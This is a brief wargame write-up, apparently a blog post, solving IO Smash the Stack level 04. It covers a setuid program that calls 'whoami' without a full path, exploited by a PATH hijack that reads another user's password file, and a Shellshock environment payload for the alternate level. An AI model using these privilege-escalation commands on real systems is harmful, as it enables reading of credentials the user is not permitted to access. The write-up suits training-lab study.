/ Greyhat.dk /

Kim Gert Nielsen

Binary pattern

IO Smash the stack level 04


level4@io:/levels$ ls -latr level04*
-r-sr-x--- 1 level5 level4 5159 Dec 18  2013 level04
-r-------- 1 level4 level4  245 Dec 18  2013 level04.c
-r-sr-x--- 1 level5 level4 5105 Sep 24  2014 level04_alt
-r-------- 1 level4 level4  120 Jan 27  2015 level04_alt.c

level4@io:/levels$ cat level04.c

//writen by bla
#include <stdlib.h>
#include <stdio.h>

int main() {
        char username[1024];
        FILE* f = popen("whoami","r");
        fgets(username, sizeof(username), f);
        printf("Welcome %s", username);

        return 0;

So it runs whoami without full path .. lets see if we can make it run our version of whoami

level4@io:~$ mkdir /tmp/desdic
level4@io:~$ cd /tmp/desdic
level4@io:/tmp/desdic$ echo "cat /home/level5/.pass" > whoami
level4@io:/tmp/desdic$ chmod 777 whoami
level4@io:/tmp/desdic$ ./whoami
cat: /home/level5/.pass: Permission denied
level4@io:/tmp/desdic$ export PATH=.:$PATH
level4@io:/tmp/desdic$ which whoami
level4@io:/tmp/desdic$ /levels/level04

Level04 alt

level4@io:/tmp/desdic$ cat /levels/level04_alt.c

//written by bla
#include <stdlib.h>
int main(){
	setresuid(geteuid(), geteuid(), geteuid());

Tried some old tricks using IFS to split the system call into usr bin id but it never worked. So I tried shellshock

level4@io:/tmp/d$ env x='() { :;}; cat /home/level5/.pass' /levels/level04_alt